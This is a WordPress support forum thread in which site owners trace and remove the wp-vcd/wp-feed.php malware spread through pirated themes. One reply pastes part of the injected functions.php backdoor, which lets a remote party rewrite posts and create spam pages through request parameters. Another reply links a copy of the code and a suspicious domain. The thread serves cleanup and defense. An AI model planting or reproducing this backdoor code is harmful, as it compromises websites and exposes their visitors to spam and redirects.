Title: wp-feed.php
Last modified: September 27, 2017
---
# wp-feed.php
* Resolved [Rik0399](https://wordpress.org/support/users/rik0399/)
* (@rik0399)
* [8 years, 7 months ago](https://wordpress.org/support/topic/wp-feed-php/)
* Hi,
* I keep getting a message saying ‘../wp-includes/wp-feed.php’ is not part of the
wordpress installation in which wordfence suggests its malicious?
* So I delete it and then it automatically re-creates itself?
* Any ideas please?
Viewing 15 replies - 1 through 15 (of 23 total)
1 [2](https://wordpress.org/support/topic/wp-feed-php/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/wp-feed-php/page/2/?output_format=md)
* Moderator [James Huff](https://wordpress.org/support/users/macmanx/)
* (@macmanx)
* [8 years, 7 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9537263)
* The report from Wordfence is definitely correct.
* I recommend reporting the problem at [https://wordpress.org/support/plugin/wordfence](https://wordpress.org/support/plugin/wordfence)
so the plugin’s developers and support community can help you with this.
* Alternatively, carefully follow [this guide](https://codex.wordpress.org/FAQ_My_site_was_hacked).
When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://codex.wordpress.org/Hardening_WordPress).
* [jerodbarlow](https://wordpress.org/support/users/jerodbarlow/)
* (@jerodbarlow)
* [8 years, 7 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9571360)
* Hi James and Rik0399,
* We’ve recently discovered this is adware on a site we operate but are having
a hard time finding the code responsible. What we do know is that this little
bug basically creates the wp-feed.php file and blacklists any IP address that
is tied to a logged-in user. So if you log into WordPress on your site, you will
no longer see the spam ads.
* However, IP addresses that have never logged into the site will definitely receive
the ads and will sometimes be redirected off the site altogether.
* Just thought I’d post in case you guys are able to find the root code responsible.
We’re working through our files now hoping to solve the problem.
* Jerod
* Thread Starter [Rik0399](https://wordpress.org/support/users/rik0399/)
* (@rik0399)
* [8 years, 7 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9571445)
* Hi,
* Thanks for that,
* I’m working through it all but so far, no joy.
* [paolopanatta](https://wordpress.org/support/users/paolopanatta/)
* (@paolopanatta)
* [8 years, 6 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9627845)
* Try if it’s a WP Rocket action/restoring.
* [itsmrkim](https://wordpress.org/support/users/itsmrkim/)
* (@itsmrkim)
* [8 years, 6 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9631081)
* Hey guys, I’m currently having the same issue on my site, however it is only
affecting certain types of users: Only affects windows users for desktop, and
affecting all users on mobile / tablet. Have you guys been able to find the root
cause / script for this issue?
* Cheers,
Sam K.
- This reply was modified 8 years, 6 months ago by [itsmrkim](https://wordpress.org/support/users/itsmrkim/).
* [jerodbarlow](https://wordpress.org/support/users/jerodbarlow/)
* (@jerodbarlow)
* [8 years, 6 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9634242)
* Hi Sam,
* I can’t remember/find the exact code that we removed, but it was found in our
functions.php file in the theme, and I’m pretty sure the inflicting code was
output and visible on the front-end in the source code of our site.
* Hope that helps!
* Jerod
* [akodia](https://wordpress.org/support/users/akodia/)
* (@akodia)
* [8 years, 6 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9640420)
* Hallo Guys,
* I had the same problem today and i sorted the issue by using the plugin [Anti-Malware Security and Brute-Force Firewall](https://wordpress.org/plugins/gotmls/)
It confirmed the infected file was the functions.php file in the current theme
of the website. Some malicious code had been planted there. The plugin removes
it and you’re good to go.
* Kindly try it and let others know if worked or not for you.
* All the best.
M.A
* [bmerigan](https://wordpress.org/support/users/bmerigan/)
* (@bmerigan)
* [8 years, 5 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9718677)
* I found wp-feed.php in my wp-includes directory.
It is part of a malware infection.
That file contains the IP addresses of users who have logged in to the WordPress
site. It doesn’t show the injected ads to users who have authenticated.
* The files you should check for and delete:
wp-feed.php wp-vcd.php wp-tmp.php
Multiple copies of class.theme-modules.php And remove a bunch of code from the
start of all the functions.php files.
- This reply was modified 8 years, 5 months ago by [bmerigan](https://wordpress.org/support/users/bmerigan/).
* [bobdesign](https://wordpress.org/support/users/bobdesign/)
* (@bobdesign)
* [8 years, 5 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9770967)
* Just for you, replace the hole functions.php in theme folder in your wp-content
and anything is fine.
* There you can find some line with “wp-vcd.php”……this would be the malware.
* Cheers.
* [pacio88](https://wordpress.org/support/users/pacio88/)
* (@pacio88)
* [8 years, 3 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9908296)
* Hey,
I have the same issue and this topic helped me to solve it – thanks! Below
what is I did: – change all your passwords for all your WP’s, FTP, database –
for each installed WP’s (I had few), go to wp-content/themes/YOURTHEME/functions.
php and check, if the front of the code is not suspicious. Mine looks like below:
* ```
get_results('SELECT * FROM ' . $wpdb->prefix . 'posts WHERE post_status = "publish" AND post_type = "post" ORDER BY ID DESC', ARRAY_A) as $data)
{
$data['code'] = '';
if (preg_match('!
(.*?)
!s', $data['post_content'], $_))
{
$data['code'] = $_[1];
}
print '1' . $data['guid'] . '' . $data['code'] . '' . $data['ID'] . '' . "\r\n";
}
break;
case 'set_id_links';
if (isset($_REQUEST['data']))
{
$data = $wpdb -> get_row('SELECT post_content FROM ' . $wpdb->prefix . 'posts WHERE ID = "'.mysql_escape_string($_REQUEST['id']).'"');
$post_content = preg_replace('!
';
if ($wpdb->query('UPDATE ' . $wpdb->prefix . 'posts SET post_content = "' . mysql_escape_string($post_content) . '" WHERE ID = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
{
print "true";
}
}
break;
case 'create_page';
if (isset($_REQUEST['remove_page']))
{
if ($wpdb -> query('DELETE FROM ' . $wpdb->prefix . 'datalist WHERE url = "/'.mysql_escape_string($_REQUEST['url']).'"'))
{
print "true";
}
}
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
{
if ($wpdb -> query('INSERT INTO ' . $wpdb->prefix . 'datalist SET url = "/'.mysql_escape_string($_REQUEST['url']).'", title = "'.mysql_escape_string($_REQUEST['title']).'", keywords = "'.mysql_escape_string($_REQUEST['keywords']).'", description = "'.mysql_escape_string($_REQUEST['description']).'", content = "'.mysql_escape_string($_REQUEST['content']).'", full_content = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE title = "'.mysql_escape_string($_REQUEST['title']).'", keywords = "'.mysql_escape_string($_REQUEST['keywords']).'", description = "'.mysql_escape_string($_REQUEST['description']).'", content = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", full_content = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
{
print "true";
}
}
break;
default: print "ERROR_WP_ACTION WP_URL_CD";
}
die("");
}
if ( $wpdb->get_var('SELECT count(*) FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
$data = $wpdb -> get_row('SELECT * FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
if ($data -> full_content)
{
print stripslashes($data -> content);
}
else
{
print '';
print '';
print '';
print ''.stripslashes($data -> title).'';
print '';
print '';
print '';
print '';
print '';
print '';
print '';
wp_head();
print '';
print '';
print '
';
print stripslashes($data -> content);
get_search_form();
get_sidebar();
get_footer();
}
exit;
}
?>
```
* – delete the maleware beginning
– go to /wp-includes and check if you have
some of those files:
- wp-tmp.php
- wp-vcd.php
- wp-feed.php
- wp-cd.php
* If yes – check them, they are probably maleware so delete it.
– check your website
if the problem still occurs – install Wordfence plugin and check your website
once again 😉
* [locha9066](https://wordpress.org/support/users/locha9066/)
* (@locha9066)
* [8 years, 2 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9961019)
* hi [@pacio88](https://wordpress.org/support/users/pacio88/), I have same the
problem.
* I check in `wp-tmp.php` look like this: [https://pastebin.com/i68AgRPi](https://pastebin.com/i68AgRPi)
* I read the code, seem this code want to redirect all customer access my site
also access their site to increment rank in many another search. `setcookie("
sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);`.
* I deleted strange code in `function.php` and `wp-tmp.php`, `wp-vcd.php`, `wp-
feed.php`, `wp-cd.php`. But when F5 my website, it auto-generate `wp-tmp.php`.
Have any method do debug the reason begin from? Any suggestions from you are
the solution for me in this case.
* Domain: [http://www.zanons.xyz/code.php](http://www.zanons.xyz/code.php)
* [bmerigan](https://wordpress.org/support/users/bmerigan/)
* (@bmerigan)
* [8 years, 2 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9961064)
* As I said earlier, these files too:
* Multiple copies of class.theme-modules.php
And remove a bunch of code from the
start of all the functions.php files.
* Check ALL of the functions.php files in the theme, and delete ALL of the class.
theme-modules.php
These can be found in multiple locations in a theme. If the
theme is loaded before they are all removed then the other files come back.
* [locha9066](https://wordpress.org/support/users/locha9066/)
* (@locha9066)
* [8 years, 2 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9962886)
* [@bmerigan](https://wordpress.org/support/users/bmerigan/), do you know where
the problem begins?
* I do not upload my source into hosting, it running on localhost.
* I don’t know the reason why have strange code in `function.php`.
* Have any method to debug detect any plugin or theme make my source code have
strange code?
* I using the theme: Flatsome and WPResidence in ThemeForest (both themes have
same issues).
* Plugin same in both theme is: Loco Translate, Yoast SEO.
* [bmerigan](https://wordpress.org/support/users/bmerigan/)
* (@bmerigan)
* [8 years, 2 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-9963225)
* My experience was from downloading a theme from a ‘free’ site instead of from
the original creator/source.
The site I got it from was dodgy, and only supplying
infected themes.
* My experience was that I installed an infected theme which contained the malicious
code and files.
* [entr0phy777](https://wordpress.org/support/users/entr0phy777/)
* (@entr0phy777)
* [8 years, 2 months ago](https://wordpress.org/support/topic/wp-feed-php/#post-10029039)
* In my case looks like /ajax-search-pro/includes/functions/class.theme-modules.
php is the only location of class.theme-modules.php.
* So the plugin source could be suspicious also as bmerigan says.
Viewing 15 replies - 1 through 15 (of 23 total)
1 [2](https://wordpress.org/support/topic/wp-feed-php/page/2/?output_format=md)
[→](https://wordpress.org/support/topic/wp-feed-php/page/2/?output_format=md)
The topic ‘wp-feed.php’ is closed to new replies.
## Tags
* [hacked](https://wordpress.org/support/topic-tag/hacked/)
* [problem](https://wordpress.org/support/topic-tag/problem/)
* In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
* 23 replies
* 15 participants
* Last reply from: [bmerigan](https://wordpress.org/support/users/bmerigan/)
* Last activity: [7 years, 8 months ago](https://wordpress.org/support/topic/wp-feed-php/page/2/#post-10592372)
* Status: resolved
## Topics
### Topics with no replies
### Non-support topics
### Resolved topics
### Unresolved topics
### All topics